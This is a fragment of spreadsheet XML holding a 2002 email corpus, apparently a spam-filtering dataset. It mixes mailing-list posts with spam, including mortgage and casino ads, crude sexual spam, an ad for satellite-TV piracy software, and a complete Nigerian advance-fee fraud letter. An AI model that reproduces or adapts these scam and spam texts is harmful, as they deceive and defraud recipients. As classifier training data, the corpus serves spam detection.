 &gt; chain in the country, after finding bombs in two stores. 
 &gt;
 "Like everyone else, I had become a
 slave to the IKEA nesting instinct.
 If I saw something like clever coffee
 table sin the shape of a yin and yang,
 I had to have it. I would flip through
 catalogs and wonder, "What kind of dining
 set defines me as a person?" We used to
 read pornography. Now it was the Horchow
 Collection. I had it all. Even the glass
 dishes with tiny bubbles and imperfections,
 proof they were crafted by the honest,
 simple, hard-working indigenous peoples of
 wherever."
  - Jack, Fight Club 
 In Fight Club, Tyler Durden destroys this nesting instinct by *bombing* 
 Jack's apartment. Hmmmm. 
 Where you going with this, Ikea boy?
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Record Low MORTGAGE rates! *Act Now*                    16533
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;DEAR HOMEOWNER,&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
 -1"&gt;
 &lt;/head&gt;
 &lt;style type=3D"text/css"&gt;
 .main {  font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12=
 px; color: #212121}
 .footer {  font-family: Verdana, Arial, Helvetica, sans-serif; font-size: =
 10px; color: #000000}
 A:link {text-decoration: none; color: #ED1C24}
 A:visited {text-decoration: none; color: #ED1C24}
 A:active {text-decoration: none; color: #F7941D}
 A:hover {text-decoration: none; color: #000000}
 A.yellow:link {text-decoration: none; color: #FFFFFF}
 A.yellow:visited {text-decoration: none; color: #FFFFFF}
 A.yellow:active {text-decoration: none; color: #000000}
 A.yellow:hover {text-decoration: none; color: #E6E6E6}
 &lt;/style&gt;
 &lt;body bgcolor=3D"#DADADA" topmargin=3D"4"&gt;
 &lt;table width=3D"600" border=3D"1" cellspacing=3D"0" cellpadding=3D"0" alig=
 n=3D"center" bordercolor=3D"#000066" class=3D"main" bgcolor=3D"#F2F2F2"&gt;
   &lt;tr&gt;&lt;td&gt;&lt;table width=3D"560" align=3D"center" border=3D"0" cellspacing=3D=
 "2" cellpadding=3D"8"&gt;&lt;tr&gt;&lt;td&gt;
     &lt;p&gt;&lt;b&gt;&lt;font size=3D"4"&gt;Dear &lt;/font&gt;&lt;font size=3D"4" color=3D"#0000CC"&gt;=
 HOMEOWNER,&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
   &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor=3D"#000099"&gt;&lt;table width=3D"=
 600" border=3D"0" cellspacing=3D"6" cellpadding=3D"6" class=3D"main"&gt;&lt;tr&gt;&lt;=
 td&gt;
     &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font color=3D"#FFFFFF" size=3D"3"&gt;Interest rat=
 es are at their lowest point in 40 years!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
   &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;
   &lt;tr&gt;&lt;td&gt;&lt;table width=3D"590" border=3D"0" cellspacing=3D"2" cellpadding=3D=
 "4" class=3D"main"&gt;&lt;tr&gt; &lt;td width=3D"50%" valign=3D"top"&gt;
     &lt;div align=3D"center"&gt; &lt;b&gt;&lt;font size=3D"5"&gt;Let us do the shopping for =
 you... AND IT'S FREE!&lt;/font&gt;&lt;/b&gt;&lt;p&gt;&lt;img src=3D"http://61.129.81.74/pix2/im=
 ages/ad2.gif" width=3D"142" height=3D"218"&gt;&lt;/p&gt;&lt;/div&gt;
   &lt;/td&gt;&lt;td width=3D"50%" valign=3D"top"&gt;
     &lt;font size=3D"3"&gt;&lt;i&gt;&lt;br&gt;Our nationwide network of lenders have hundred=
 s of different loan programs to fit your current situation:&lt;/i&gt;&lt;b&gt;&lt;ul&gt;
     &lt;li&gt;Refinance&lt;/li&gt;&lt;li&gt;Second Mortgage&lt;/li&gt;&lt;li&gt;Debt Consolidation&lt;/li&gt;&lt;=
 li&gt;Home Improvement&lt;/li&gt;&lt;li&gt;Purchase &lt;/li&gt;&lt;/ul&gt;&lt;/b&gt;&lt;p&gt;&lt;/p&gt;
     &lt;p&gt;Please &lt;b&gt;&lt;a href=3D"http://rd.yahoo.com/dir/?http://www.8121919554=
 75675676734203545847582013@61.129.81.78/pix2/mortgageform.htm"&gt;CLICK HERE&lt;=
 /a&gt;&lt;/b&gt; to fill out a quick form. Your request will be transmitted to our =
 network of mortgage specialists.&lt;/p&gt;&lt;/font&gt;
   &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
   &lt;table width=3D"600" border=3D"0" cellspacing=3D"2" cellpadding=3D"2"&gt;&lt;t=
 r&gt;&lt;td bgcolor=3D"#0D86FF"&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
   &lt;table width=3D"600" border=3D"0" cellspacing=3D"2" cellpadding=3D"8" cl=
 ass=3D"main"&gt;&lt;tr&gt;&lt;td bgcolor=3D"#0066CC"&gt; 
     &lt;div align=3D"center"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;This service is &lt;a href=3D"h=
 ttp://rd.yahoo.com/dir/?http://www.812191956757575734203545847582013@61.12=
 9.81.74/pix2/mortgageform.htm" class=3D"yellow"&gt;100% FREE&lt;/a&gt; to home owne=
 rs and new home buyers without any obligation.&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
   &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
   &lt;table align=3D"center" width=3D"600" cellspacing=3D"2" cellpadding=3D"2=
 " border=3D"0" class=3D"footer"&gt;&lt;tr&gt; &lt;td colspan=3D"2"&gt;&lt;br&gt;
     &lt;font color=3D"ED1C24"&gt;Did you receive an email advertisement in error=
 ?&lt;/font&gt; Our goal is to only target individuals who would like to take adv=
 antage of our offers. If you'd like to be removed from our mailing list, p=
 lease click on the link below. You will be removed immediately and automat=
 ically from all of our future mailings.&lt;br&gt;
     &lt;br&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt; &lt;td&gt;We protect all email addresses from other third=
  parties. Thank you.
   &lt;/td&gt;&lt;td align=3D"right"&gt;&lt;a href=3D"http://rd.yahoo.com/dir/?http://61.1=
 29.81.74/remove/remove.htm"&gt;Please remove me.&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: =?iso-2022-jp?B?GyRCRnxLXDhsJE43b0w+IUolNSVWJTglJyUvJUghSyEhJTkbKEI=?=
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [WM] greencard 2004 ekiliini karmayn
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 5 Sep 2002 bitbitch@magnesium.net wrote:
 &gt; Again, these situations are great, provided everyone is aware that the
 &gt; relationship is a contractual one -- he wants a maid, a dog and a
 &gt; prostitute he doesn't have to pay, and she wants a country that isn't
 &gt; impoverished and teeming with AIDS.
 You assume that they just match people up and marry them off, and neither is
 attracted to the other, which is not the case. Even this has arranged
 marrage beat by a long way.
 Males gets: A wife for a while, and if they actually like each other, for a
 long time.
 Female gets: Into Britan, out of a country with no real rights for women, no
 opportunities for her or her children, out of the polution, AIDS, and an
 uncountable number of scary tropical diseases. Not to mention in most cases
 living conditions that us spoiled Americans cannot even comprehend.
 Yea, the women is definately getting tha bad end of the deal here.
 You're so easy to taunt :)
 - Adam L. "Duncan" Beberg
   http://www.mithral.com/~beberg/
   beberg@mithral.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Fake bank website cons victims
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;From the BBC website - www.bbc.co.uk
  Tuesday, 8 October, 2002, 09:43 GMT 10:43 UK 
  Fake bank website cons victims
  West African criminals have used a fake version of a British bank's online
  service to milk victims of cash, say police. The fake site was used to squeeze
  more money out of people they had already hooked. 
  The site has been shut down. But UK National Criminal Intelligence Service,
  (NCIS), said at least two Canadians had lost more than $100,000 after being
  taken in by the fake website. 
  The scam behind the fake web domain was the familiar one that offers people a
  share of the huge sums of money they need moved out of various African
  nations. 
  NCIS said the use of the web was helping the conmen hook victims that would
  otherwise spot the scam. 
  Convincing site 
  News of this latest scam was revealed by BBC Radio5Live. It found that an
  unclaimed web domain of a UK bank had been used by conmen to get more cash out
  their victims. 
  A NCIS spokesman said the domain looked legitimate because it had "the" in
  front of the bank's name. 
  "I have seen the microsite myself and it's very sophisticated," said the NCIS
  spokesman. "It's very convincing especially to people not very experienced
  online." 
  Once the con was discovered it was quickly shut down. However, the people
  behind it have not been caught. 
  NCIS does know that at least two people have lost more than $100,000. 
  The bank involved has bought up the domain used in the con as well as many
  other permutations of its name to limit the chance it could happen again. 
  Domain games 
  Usually people are first hooked in to what has become known as Advanced Fee or
  419 fraud by replying to an unsolicited fax or e-mail offering a share of any
  cash successfully moved out of Africa. 
  The '419' refers to the part of the Nigerian penal code dealing with such
  crimes. 
  Like any con, there is no money to be moved at all and instead anyone taking
  the bait is asked to pay increasingly large sums to supposedly bribe
  uncooperative officials and to smooth the passage of the cash. 
  Although this con has been practiced for years, people still fall victim to
  it. 
  NCIS estimates that up to five Americans are sitting in hotel lobbies in
  London everyday waiting to meet people connected with this con. 
  Cutting edge fraud 
  Often the conmen provide fake banking certificates to give the con an air of
  legitimacy. 
  People tricked into clicking on fake sites
  But a spokesman for NCIS said fake or spoof websites are now being used in
  place of the certificates. 
  "To many people nowadays the cutting edge of banking technology is web
  technology," said the spokesman. 
  One of the first groups of conmen to use this method set up a fake website
  that supposedly gave victims access to accounts held at the South African
  Reserve Bank, the country's national bank. 
  Typically, victims are given a login name and password and are encouraged to
  visit the site so they can see that the cash they are getting a share of has
  been deposited in their name. 
  But before they can get their hands on the cash, the victims are typically
  asked to hand over more of their own money to help the transfer go ahead. 
  Once the South African police discovered the ruse they declared it a national
  priority crime and soon arrested the 18 people behind it. 
  Modern gloss 
  An briefing paper prepared by NCIS in August on organised crime noted that
  criminals were increasingly turning to the web to lure new victims and give
  old cons a modern gloss. 
  The NCIS spokesman urged people who have fallen victim to 419 fraud to come
  forward and help it track down the perpetrators. He said in the last two
  months it had arrested 24 people overseas involved with this type of fraud. 
  He said any e-mail, fax or letter making an offer that looks to good too be
  true, undoubtedly is. 
  One of the first companies to fall victim to website spoofing was net payment
  service Paypal. 
  Conmen set up a fake site and asked people to visit and re-enter their account
  and credit card details because Paypal had lost the information. 
  The website link included in the e-mail looked legitimate but in fact directed
  people to a fake domain that gathered details for the conmen's personal use. 
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 Sell a Home for Top $
 http://us.click.yahoo.com/RrPZMC/jTmEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: Great Casino, Great Payouts, Great Fun from your own home! 559928
</t>
  </si>
  <si>
    <t xml:space="preserve">
 We invite you to experience the most exciting casino and sports wagering and poker experience on the 'net!!
 http://instant-access.ws 
 Join hundreds of members who play with us and win CASH MONEY! 
 Using a licensed gaming system from Starnet Communications, the recognized leader in online gaming, Our Casino gaming system is safe, secure and reliable. We also provide round the clock technical support and service to our customers. Our friendly customer reps are ready to answer your calls and answer any questions you may have.
 http://instant-access.ws 
 With Our Casino you get: 
 Real money wagering on 25+ games and sports 
 Stunning 3D Graphics and unequaled gameplay 
 Safe, Secure and Reliable gaming system 
 Online Java Games 
 FREE casino software 
 10% signup bonus for first time players to our Casino 
 24 hour technical support
 http://instant-access.ws
 For you Poker Players who enjoy live internet poker action playing favorite card games like Texas Hold'em, Seven Card Stud and Omaha we have made available seperate state of the art Poker Room software.
 All of our games offered, give you the opportunity to play for free or wager with real money.
 We encourage you to visit us now!  
 http://instant-access.ws
 ********************************************************
 IMPORTANT: To be removed from this list, simply click the link below. You 
 will be added to our remove list. 
 REMOVE MESSAGE: 
 This message is being sent in full compliance with US Postal and 
 Lottery Laws, Title 18, Section 1302 and 1341, or 
 Title 18, Section 3005 in the US code, also in the 
 code of federal regulations, Volume 16, 
 Sections 255 and 436. 
 If you would like to be removed from our E-Mail list, please click here 
 mailto:remove9001@xyz002.com?subject=Remove , click send,  and you will be 
 removed from our list immediately. 
 If the mailto link is not clickable please send a blank email to 
 remove9001@xyz002.com and put "remove" in the subject line, click send, and 
 you will be removed from our list immediately. 
 **** 
     LoU
 *****
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Shader Integration: Merging Shading Technologies on the Nintendo
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8494551,159/
 Date: 2002-10-03T05:50:07+01:00
 Rendering polygons is not as easy as it used to be, the reason being the vast 
 amount of different rendering techniques, methods and algorithms available. Not 
 only is choosing the right ones a problem, even worse, all that are selected 
 need to work together. There are some algorithms which simply do not work 
 together, and in that case, only one may be used whilt the other one needs to 
 be replaced witha more compatible method. This feature explores how Factor 5 
 approached the problem when developing Rogue Leader for Gamecube.
</t>
  </si>
  <si>
    <t xml:space="preserve">I used Async IO on System V in the '87, '88 time frame.  I did it that
 way cause I thought it was cool to see if I could keep the tape
 spinning.
 I can believe Linux is catching up to this, but some ability to do async
 IO already existed in the UNIX world.
 John Hall
 13464 95th Ave NE
 Kirkland WA 98034
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 Adam
 &gt; L. Beberg
 &gt; Sent: Saturday, August 31, 2002 7:35 PM
 &gt; To: fork@spamassassin.taint.org
 &gt; Subject: Gasp!
 &gt; 
 &gt; "Red Hat Linux Advanced Server provides many high end features such
 as:
 &gt; Support for Asynchronous I/O. Now read I/O no longer needs to stall
 your
 &gt; application while waiting for completion."
 &gt; 
 &gt; Could it be? After 20 years without this feature UNIX finally catches
 up
 &gt; to
 &gt; Windows and has I/O that doesnt totally suck for nontrivial apps? No
 way!
 &gt; 
 &gt; OK, so they do it with signals or a flag, which is completely ghetto,
 but
 &gt; at
 &gt; least they are trying. Keep trying guys, you got the idea, but not the
 &gt; clue.
 &gt; 
 &gt; - Adam L. "Duncan" Beberg
 &gt;   http://www.mithral.com/~beberg/
 &gt;   beberg@mithral.com
</t>
  </si>
  <si>
    <t xml:space="preserve">    Date:        Wed, 21 Aug 2002 10:54:46 -0500
     From:        Chris Garrigues &lt;cwg-dated-1030377287.06fa6d@DeepEddy.Com&gt;
     Message-ID:  &lt;1029945287.4797.TMDA@deepeddy.vircio.com&gt;
   | I can't reproduce this error.
 For me it is very repeatable... (like every time, without fail).
 This is the debug log of the pick happening ...
 18:19:03 Pick_It {exec pick +inbox -list -lbrace -lbrace -subject ftp -rbrace -rbrace} {4852-4852 -sequence mercury}
 18:19:03 exec pick +inbox -list -lbrace -lbrace -subject ftp -rbrace -rbrace 4852-4852 -sequence mercury
 18:19:04 Ftoc_PickMsgs {{1 hit}}
 18:19:04 Marking 1 hits
 18:19:04 tkerror: syntax error in expression "int ...
 Note, if I run the pick command by hand ...
 delta$ pick +inbox -list -lbrace -lbrace -subject ftp -rbrace -rbrace  4852-4852 -sequence mercury
 1 hit
 That's where the "1 hit" comes from (obviously).  The version of nmh I'm
 using is ...
 delta$ pick -version
 pick -- nmh-1.0.4 [compiled on fuchsia.cs.mu.OZ.AU at Sun Mar 17 14:55:56 ICT 2002]
 And the relevant part of my .mh_profile ...
 delta$ mhparam pick
 -seq sel -list
 Since the pick command works, the sequence (actually, both of them, the
 one that's explicit on the command line, from the search popup, and the
 one that comes from .mh_profile) do get created.
 kre
 ps: this is still using the version of the code form a day ago, I haven't
 been able to reach the cvs repository today (local routing issue I think).
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">--- In forteana@y..., "David McQuirk" &lt;David.McQuirk@D...&gt; wrote:
 &gt; TimH:
 &gt; 
 &gt; &gt;I was watching that last night and I couldn't help wondering if 
 one 
 &gt; &gt;of the GIs was Dexter Fletcher out of the Crystal Maze. 
 &gt; Yup, was him out of Press Gang
 &gt; 
 &gt; &gt;Who once snogged Shauna Lowery, if anyones heard of her. 
 &gt; Did you have to kneel down?
 &gt; 
 &gt; 
 &gt; Dave
 Its possibly a different Shauna Lowery: The one I'm talking about is 
 about 7 foot tall and presents "Animal Hospital" or something like 
 that.
 tim h
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Living Love - Another legacy of the 60's
</t>
  </si>
  <si>
    <t xml:space="preserve">Normally, I disdain any kind of mysticism, even when it is associated 
 with fairly good ideas.  Just a big turnoff.  A good example would be 
 the difference between Yoga/TM and the more scientifically pure, but 
 related, relaxation techniques including "betagenics", 
 hypnosis/auto-hypnosis, etc.  (This was one of the many topics I 
 obsessively absorbed as a teenager.)  Or Tai Chi etc. vs. Tai Bo / 
 G-Force Dyno-Staff.
 I have to say however that, having found this while looking for 
 something completely unrelated, it has some cute truisms.  I 
 particularly like their addiction to non-addiction.  Additionally, the 
 Mindprod treehugger site has some interesting quotes, etc.
 To my internal ear, nearly all of these 60's based new-age vernacular 
 seem to assume that you are a simple child (of the 60's?) who needs some 
 religion-like couching of ideas to relate and internalize.  Very 
 irritating, but taken in small doses it's interesting to compare and 
 contrast with our (my) modern mental models.
 I found that a few of the principles could be used to explain and 
 justify US/UN foreign policy and actions.
 http://mindprod.com/methods.html
 http://members.aol.com/inossence/Kenkey.html
 http://www.mindprod.com/
 (Apologies for the embedded HTML.)
 We create the world we live in.
 A loving person lives in a loving world,
 A hostile person lives in a hostile world.
 Everyone you meet is your mirror.
 You make yourself and others suffer just as much when you take offence 
 as when you give offence. To be upset over what you don't have is to 
 waste what you do have.
 The past is dead,
 The future is imaginary,
 Happiness can only be
 in the Eternal Now Moment
 How soon will you realize that the only thing you don't have is the 
 direct experience that there's nothing you need that you don't have.
 Love a person because he or she is there.
 This is the only reason.
 Happiness happens when your consciousness is not dominated by addictions 
 and demands~ and you experience life as a parade of preferences.
 The
 purpose
 of our lives
 is to be free
 of all addictive traps,
 and thus
 become one
 with the ocean of
 Living Love.
 sdw
 -- 
 sdw@lig.net http://sdw.st
 Stephen D. Williams 43392 Wayside Cir,Ashburn,VA 20147-4622
 703-724-0118W 703-995-0407Fax Dec2001
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Please help Home Entertainment Companies with Survey - Win a DVR!
</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;p&gt;We thank you for just a moment of your time.  NextResearch is inviting you to join a panel of consumer electronics users now being created to help manufacturers, network programmers, and entertainment companies shape their future offerings.  In exchange for your willingness to participate, there will be prizes and incentives awarded. ALL CONTACT INFORMATION WILL BE HELD IN STRICTEST CONFIDENCE AND WE WILL NEVER TRY TO SELL YOU ANYTHING.  You will be able to opt-out of the panel at any time.&lt;/p&gt; 
 					Please click here &lt;a href=http://65.19.137.17/nextresearch/nr.htm&gt;http://65.19.137.17/nextresearch/nr.htm&lt;/a&gt; if you would like to participate in your first survey and earn a chance to win one of 25 new Digital Video Recorders being awarded in September!  (You do not have to join the panel to participate in this survey.) This is a national market research program conducted with the highest ethical standards. Feel free to contact program director, Jennifer Choate at 901.491.4995 with any questions.  To unsubscribe from this list, simply reply to this email to be removed from future invitations to participate. 
 					&lt;p&gt;Thank you again for your consideration,&lt;/p&gt; 
                     &lt;p&gt;NextResearch&lt;/p&gt; 
 					(&lt;a href=http://www.nextresearch.com&gt;http://www.nextresearch.com&lt;/a&gt;)&lt;/p&gt; 
 					&lt;p&gt;Link to survey: &lt;a href=http://65.19.137.17/nextresearch/nr.htm&gt;http://65.19.137.17/nextresearch/nr.htm&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: All Satellite Channels Free !!                     27886
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;
 &lt;BODY&gt;
 &lt;center&gt;
 &lt;font size=3D"4"&gt;&lt;font color=3D"blue"&gt;&lt;b&gt;
 Free sports, Free xxx Movies, Free Pay perview.
 &lt;/b&gt;&lt;/font&gt;&lt;/center&gt;&lt;BR&gt;
 &lt;center&gt;
 &lt;font size=3D"5"&gt;&lt;font color=3D"red"&gt;&lt;b&gt;Get All Satellite Channels Free !!
 &lt;/b&gt;&lt;/font&gt;&lt;BR&gt;
 &lt;BR&gt;&lt;BR&gt;
 &lt;blockquote&gt;
 &lt;ul&gt;
 &lt;font size=3D"4"&gt;&lt;font color=3D"blue"&gt;
 Now your can program your satellite system to get all&lt;BR&gt;
 channels free. This include Direct Tv, Dishnetwork &lt;BR&gt;
 and Gla. Our satellite programming packages comes with&lt;BR&gt;
 everything your need to program your satellite system.&lt;BR&gt;
 The software is ease as 1,2,3 to use and it takes less&lt;BR&gt;
 that 5 minute to program your satellite system. There &lt;BR&gt;
 are company that will charge you up to $600 to do this&lt;BR&gt;
 for you and everytime your card needs to be reset they &lt;BR&gt;
 charge you an extra $100.00 Now you can do it yourself for :&lt;BR&gt;&lt;BR&gt;
 &lt;font size=3D"5"&gt;&lt;font color=3D"brown"&gt;&lt;b&gt;Only $99.00
 &lt;/b&gt;&lt;/font&gt;&lt;BR&gt;&lt;BR&gt;
 &lt;font size=3D"4"&gt;&lt;font color=3D"red"&gt;&lt;b&gt;
 &lt;a href=3D"mailto:satplus2020@yahoo.com"&gt;Email us &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;
 for order information.
 &lt;/ul&gt;
 &lt;/blockquote&gt;
 &lt;/center&gt;
 &lt;html&gt;
 &lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;
 &lt;html&gt;&lt;p&gt;&lt;BR&gt;&lt;p&gt;&lt;p&gt;&lt;p&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: REQUEST FOR MUTUALLY BENEFITTING ENDEAVOUR.
</t>
  </si>
  <si>
    <t xml:space="preserve">OWOLABI &amp; ASSOCIATE,
 FALOMO, IKOYI.
 LAGOS - NIGERIA.
 YOUR KIND ATTN.,
 RE: REQUEST FOR MUTUALLY BENEFITTING ENDEAVOUR.
 I humbly crave your indulgence in sending you this
 mail, if the contents does not meet with your personal
 and business ethics, I apologize in advance.
 I am Barrister Kola Owolabi( attorney at law), I
 represent Alhaji Ishmaila Ibrahim Gwarzo’s estates. Alhaji Gwarzo was the chief
 security advicer of the then military leader of this country(Nigeria) in the
 person of Late General Sani Abacha who died on the 8th of June 1998. With the
 advent of a new democratic
 dispensation in the country under the leadership of
 Gen. Olusegun Obasanjo (Rtd), my client has come under
 severe persecution due to the sensitive position he
 held in the last military regime, presently he is
 under house arrest restricted only to the confines of
 his village.
 The main purpose of this mail is to intimate you of a
 business proposal that might be of interest to you. My
 client has informed me of the existence of funds
 deposited with a security company abroad. This fund
 came about as part of security votes that were
 allocated to my client's portfolio during his tenure
 as chief security adviser to the then president. What
 happened was that he had part of the funds transferred
 from the vaults of the Central Bank Of Nigeria to this
 security outfit with the aim of purchasing arms and ammunitions for the personal
 security outfit of the
 then president. But before the purchase could take
 place the president died. My client has decided to
 keep this for himself as all his properties has been
 confisticated by the present regime. But due to his
 incarceration he cannot travel out and effect the
 change of possession to his benefit.
 I have been mandated by my client to source for a
 foreign partner that can help him facilitate the
 change of possession. The deposit certificate and the
 code needed for the execution of this endeavor are in
 my possession.
 The funds in question is USD17.6M (Seventeen Million, Six Hundred Thousand
 United States dollars Only). Should this proposition be of interest to you, you can reach me through my e-mail address so that we can go through the rudiments of this endeavor.
 I remain most obliged.
 Barrister Kola Owolabi(JP).
 Principal Partner. Owolabi &amp; Associates
 __________________________________________________________________
 Your favorite stores, helpful shopping tools and great gift ideas. Experience the convenience of buying online with Shop@Netscape! http://shopnow.netscape.com/
 Get your own FREE, personal Netscape Mail account today at http://webmail.netscape.com/
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: It's a small world
</t>
  </si>
  <si>
    <t xml:space="preserve">Strata just walked up to me in a cafe in Somerville, MA and
 asked me how I was getting net here. And _then_ we figured out 
 that we have shared context.
         Jesse
 -- 
 jesse reed vincent -- root@eruditorum.org -- jesse@fsck.com 
 70EBAC90: 2A07 FC22 7DB4 42C1 9D71 0108 41A3 3FB3 70EB AC90
 I have images of Marc in well worn combat fatigues, covered in mud, 
 sweat and blood, knife in one hand and PSION int he other, being 
 restrained by several other people, screaming "Let me at it! 
 Just let me at it!"  Eichin standing calmly by with something 
 automated, milspec, and likely recoilless.
 				-monty on opensource peer review
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Stories for 2002-09-11
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Newsletter
 In this issue:
     * DynDNS.org Offers Free DNS To Perl Sites
 +--------------------------------------------------------------------+
 | DynDNS.org Offers Free DNS To Perl Sites                           |
 |   posted by KM on Tuesday September 10, @08:23 (news)              |
 |   http://use.perl.org/article.pl?sid=02/09/10/1225228              |
 +--------------------------------------------------------------------+
 [0]krellis writes "[0]DynDNS.org today [1]announced that it will provide
 free premium DNS services (primary and secondary DNS hosting) to any
 domains involved in the Perl Community. Read the press release for full
 details, [2]create an account, and [3]request credit under the Perl DNS
 offer! Never lose traffic to your Perl site due to failed DNS again!"
 Sweet. Thanks.
 Discuss this story at:
     http://use.perl.org/comments.pl?sid=02/09/10/1225228
 Links:
     0. http://www.dyndns.org/
     1. http://www.dyndns.org/news/2002/perl-dns.php
     2. https://members.dyndns.org/policy.shtml
     3. https://members.dyndns.org/nic/perl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</si>
  <si>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[ILUG] Am I cracked?
</t>
  </si>
  <si>
    <t xml:space="preserve">Well you know what I mean.
 I noticed 2 connections from my
 (freshly installed RH7.3) machine to
 port 80 of the following addresses.
 216.145.20.5
 216.254.17.87
 Both resolve to cytocin.hubbe.NET
 using CCOM.NET &amp; speakeasy.NET DNS
 servers respectively.
 Both connections lasted about 20
 seconds and were about 2 minutes apart.
 Any ideas?
 I didn't see what processes they came from,
 but I'm keeping a close eye now.
 Thanks,
 Pdraig.
 p.s. I'm can't subscribe to the list
 at the moment for some reason? so please
 reply directly.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Fw: [nessie] New Nessie Pics
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Gordon Rutter
 gordon@rutter.freeserve.co.uk
 Join the Fortean Book Reviews list at 
 forteanbookreviews-subscribe@yahoogroups.com
 &gt; &lt;PRE&gt;The latest potential pictures of Nessie - underwater - are at 
 &gt; www.hi-lands.com
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Not too old to put out!                   26792
</t>
  </si>
  <si>
    <t xml:space="preserve">
 WET, HORNY AND DIRTY GRANDMAS!
 Remember how you lusted after your friend's mum in high
 school? She was 46 and you were 15? Remember the time
 when she bent over to do her gardening and you saw her
 sagging breasts through the v-neck opening of her summer
 dress? She was OLD and you LOVED her! All you wanted to
 do was FUK that Dirty Old Mole BLUE! You can now! Follow
 the link below to see just how OLD &amp; DIRTY these moles are!
 http://62.16.101.30/jump2/index.html
 Remove here:
 http://62.16.101.30/jump1/remove.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Peter Peltonen (peter.peltonen@iki.fi) wrote*:
 &gt;BTW: I just a found a quite nice looking apt repositry for
 &gt;all kinds of audio apps at
 &gt;
 &gt;http://ccrma-www.stanford.edu/planetccrma/software/
 &gt;
 _Very_ comprehensive audio app collection, Thanks.
 --
 That's "angle" as in geometry.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: IMHO 1.10 - Chomsky, Fashion, and Segways
</t>
  </si>
  <si>
    <t xml:space="preserve">                  ___           ___           ___
                  /\  \         /\  \         /\  \
     ___         |::\  \        \:\  \       /::\  \
    /\__\        |:|:\  \        \:\  \     /:/\:\  \
   /:/__/      __|:|\:\  \   ___ /::\  \   /:/  \:\  \
  /::\  \     /::::|_\:\__\ /\  /:/\:\__\ /:/__/ \:\__\
  \/\:\  \__  \:\~~\  \/__/ \:\/:/  \/__/ \:\  \ /:/  /
   ~~\:\/\__\  \:\  \        \::/__/       \:\  /:/  /
      \::/  /   \:\  \        \:\  \        \:\/:/  /
      /:/  /     \:\__\        \:\__\        \::/  /
      \/__/       \/__/         \/__/         \/__/           one.ten
                                                             27.11.02
